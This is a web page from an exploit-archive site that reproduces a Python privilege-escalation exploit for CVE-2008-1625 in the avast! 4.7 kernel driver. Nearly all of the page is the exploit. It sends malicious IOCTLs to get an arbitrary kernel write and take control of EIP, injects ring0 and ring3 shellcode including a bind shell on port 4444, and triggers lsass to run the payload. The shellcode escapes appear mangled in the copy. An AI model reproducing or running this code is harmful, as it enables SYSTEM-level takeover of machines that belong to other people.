Advertisement




Edit Report

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010040177

Below is a copy:

#!/usr/bin/python
# avast! 4.7 aavmker4.sys privilege escalation
# http://www.trapkit.de/advisories/TKADV2008-002.txt
# CVE-2008-1625
# Tested on WindXpSp2/Sp3 Dep ON
# Matteo Memelli ryujin __A-T__ offensive-security.com
# www.offensive-security.com
# Spaghetti & Pwnsauce - 17/04/2010
# Tested on WinXPSP2/SP3 english | avast! 4.7.1098.0
from ctypes import *
import time, struct, sys, thread, os
 
kernel32 = windll.kernel32
Psapi    = windll.Psapi
 
def findSysBase(drv):
    print "(+) Retrieving %s base address..." % drv
    ARRAY_SIZE            = 1024
    myarray               = c_ulong * ARRAY_SIZE
    lpImageBase           = myarray()
    cb                    = c_int(1024)
    lpcbNeeded            = c_long()
    drivername_size       = c_long()
    drivername_size.value = 48
    Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
    for baseaddy in lpImageBase:
        drivername = c_char_p("x00"*drivername_size.value)
        if baseaddy:
            Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername,
                            drivername_size.value)
            if drivername.value.lower() == drv:
                print "(+) Address retrieved: %s" % hex(baseaddy)
                return baseaddy
    return None
 
def checkShell():
    check = "netstat -an | find "4444""
    res = os.popen(check)
    ret = res.read()
    res.close()
    if ret.find("0.0.0.0:4444") != -1:
        return True
    else:
        return False
 
def kickLsass():
    time.sleep(10)
    lsas1 = "echo hola | runas /user:administrator cmd.exe > NUL"
    lsas2 = "net use \\127.0.0.1 /user:administrator test > NUL"
    nc    = "nc 127.0.0.1 4444"
    print "(!) NO BSOD? good sign :)"
    print "(*) Sleeping 60 secs before the Woshi finger hold..."
    time.sleep(60)
    # Trying to kick ls-ass, any auth good or failed should help
    # if this doesn't work for you try to rdp to the vuln box or
    # logout/login from console... it's rough but should work ;)
    print "(+) Trying to fail an auth to trigger syscall..."
    os.system(lsas1)
    time.sleep(1)
    os.system(lsas2)
    while 1:
        res = checkShell()
        if res:
            print "($) Shell is ready 0.0.0.0:4444"
            #os.system(nc)
            #print "(-) netcat not in path but shell is open!"
            break
        print "(*) Retrying. Sleeping 30 secs..."
        time.sleep(30)
        print "(+) Trying to fail an auth to trigger syscall..."
        os.system(lsas1)
        time.sleep(1)
        os.system(lsas2)
     
def pwnDrv(driver_handle2, IOCTL_EIP, stor_input, stor_size, stor_output,
            out_size, dwReturn1):
    # We trigger func pointer to control EIP
    time.sleep(5)
    print "(+) Owning EIP..."
    for i in range(1,3):
        print "(+) Triggering function pointer: %d/2" % i
        dev_ioctl = kernel32.DeviceIoControl(driver_handle2, IOCTL_EIP, stor_input,
                            stor_size, stor_output, out_size,
                            byref(dwReturn1), None)
        time.sleep(0.5)
     
if __name__ == '__main__':
    print "(*) avast! 4.7 aavmker4.sys privilege escalation"
    print "(+) coded by Matteo Memelli aka ryujin -> at <- offsec.com"
    print "(+) www.offsec.com || Spaghetti & Pwnsauce"
    print "(+) tested on WinXPSP2/SP3 DEP On 17/04/2010"
    GENERIC_READ  = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    CREATE_ALWAYS = 0x2
    IOCTL_STOR    = 0xb2d6001c # stores stuff to bypass checks in .data
    IOCTL_VULN    = 0xb2d60030 # writes to arbitrary memory
    IOCTL_EIP     = 0xb2d60020 # triggers function pointer to own EIP
    # DosDevicesAAVMKER4 DeviceAavmKer4
    DEVICE_NAME   = "\\.\AavmKer4"
    dwReturn1     = c_ulong()
    dwReturn2     = c_ulong()
    evil_size     = 0x878
    out_size      = 0x1024
    stor_size     = 0x418
    evil_output   = ""
    stor_output   = ""
    driver_name   = 'aavmker4.sys'
 
    # evil_input = 0x878
    # Payload = 496 bytes
    # ring0_migrate = 45 bytes || # xf0x01 bytes to copy
    ring0_migrate = (
    "xfcxfaxebx24x5ex68x76x01x00x00x59x0fx32x89x86x69"
    "x00x00x00x8bxbex6dx00x00x00x89xf8x0fx30xb9xf0x01"
    "x00x00xf3xa4xfbxf4xebxfdxe8xd7xffxffxff" )
     
    # ring0_msr = 117 bytes
    ring0_msr = (
    "x6ax00x9cx60xe8x00x00x00x00x58x8bx98x60x00x00x00"
    "x89x5cx24x24x81xf9xdexc0xadxdex75x10x68x76x01x00"
    "x00x59x89xd8x31xd2x0fx30x31xc0xebx3ax8bx32x0fxb6"
    "x1ex66x81xfbxc3x00x75x2ex8bx98x68x00x00x00x8dx9b"
    "x75x00x00x00x89x1axb8x01x00x00x80x0fxa2x81xe2x00"
    "x00x10x00x74x11xbax00xffx3fxc0x81xc2x04x00x00x00"
    "x81x22xffxffxffx7fx61x9dxc3xffxffxffxffx00x04xdf"
    "xffx00x04xfex7f" )
     
    # ring3_stager = 61 bytes
    ring3_stager = (
    "x60x6ax30x58x99x64x8bx18x39x53x0cx74x2ex8bx43x10"
    "x8bx40x3cx83xc0x28x8bx08x03x48x03x81xf9x6cx61x73"
    "x73x75x18xe8x0ax00x00x00xe8x10x00x00x00xe9x09x00"
    "x00x00xb9xdexc0xadxdex89xe2x0fx34x61xc3" )
         
    # msf payload: bindshell port 4444 318 bytes
    ring3_shellcode = (
    "xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45"
    "x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49"
    "x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d"
    "x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66"
    "x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61"
    "xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40"
    "x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32"
    "x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6"
    "x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09"
    "xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0"
    "x66x68x11x5cx66x53x89xe1x95x68xa4x1ax70xc7x57xff"
    "xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53"
    "x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff"
    "xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64"
    "x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89"
    "xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab"
    "xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51"
    "x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53"
    "xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6"
    "x52xffxd0x68xefxcexe0x60x53xffxd6xffxd0xc3" )
 
    sysbase       = findSysBase(driver_name)
    if not sysbase:
        print "(-) Couldn't retrieve driver base address, exiting..."
        sys.exit()
 
    driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
                        0, None, CREATE_ALWAYS, 0, None)
    driver_handle2 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
                        0, None, CREATE_ALWAYS, 0, None)
     
    # .data memory area we write to; offset from base = 0x2e04
    read_data_from= struct.pack('L', sysbase+0x2e04) # calculate addy in .data
    # r0_address = noplsed address, jump 0xfa bytes ahead to avoid a corrupted nop
    r0_address    = struct.pack('L', sysbase+0x23fa)
    evil_input    = r0_address*2 + "x90"*0x102
    evil_input   += ring0_migrate + ring0_msr + ring3_stager + ring3_shellcode
    evil_input   += "x41"*0x549
    evil_input   += read_data_from + "x42x42x42x42" # bypass input checks
    stor_input    = "x43x43x43x43" # padding
    stor_input   += "x07xADxDExD0" # cmp dword ptr [eax], 0D0DEAD07h
    stor_input   += "xBAxD0xBAx10" # cmp dword ptr [eax+4], 10BAD0BAh
    stor_input   += "x44x44x44x44"*2
    # After arbitrary write to memory nt!KeSetEvent is called: we need to fix
    # nt!KeSetEvent+0x32 using any addy  pointing  to value different to 0x01
    # so we can use our "read_data_from" again.
    stor_input   += read_data_from
    stor_input   += "x44x44x44x44"
    # 0x2300 offset from base: we write here to control a function pointer
    # and own EIP
    stor_input   += struct.pack('L', sysbase+0x2300) + "x45"*414
 
    # trigger these later on...
    thread.start_new(pwnDrv, (driver_handle2, IOCTL_EIP, stor_input, stor_size,
                    stor_output, out_size, dwReturn1))
    thread.start_new(kickLsass, ())
    ###########################################################################
 
    # And now let's own the boy:
    if driver_handle1:
        # We store values to overcome input checks
        print "(+) Storing our precious in kernel space ;) ..."
        dev_ioctl = kernel32.DeviceIoControl(driver_handle1, IOCTL_STOR, stor_input,
                            stor_size, stor_output, out_size,
                            byref(dwReturn1), None)
        # We trigger arbitrary write
        print "(*) Sending evil IOCTL..."
        print "(+) Pwnage in progress...."
        dev_ioctl = kernel32.DeviceIoControl(driver_handle1, IOCTL_VULN,
                            evil_input, evil_size, evil_output,
                            evil_size,
                            byref(dwReturn2), None)


Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.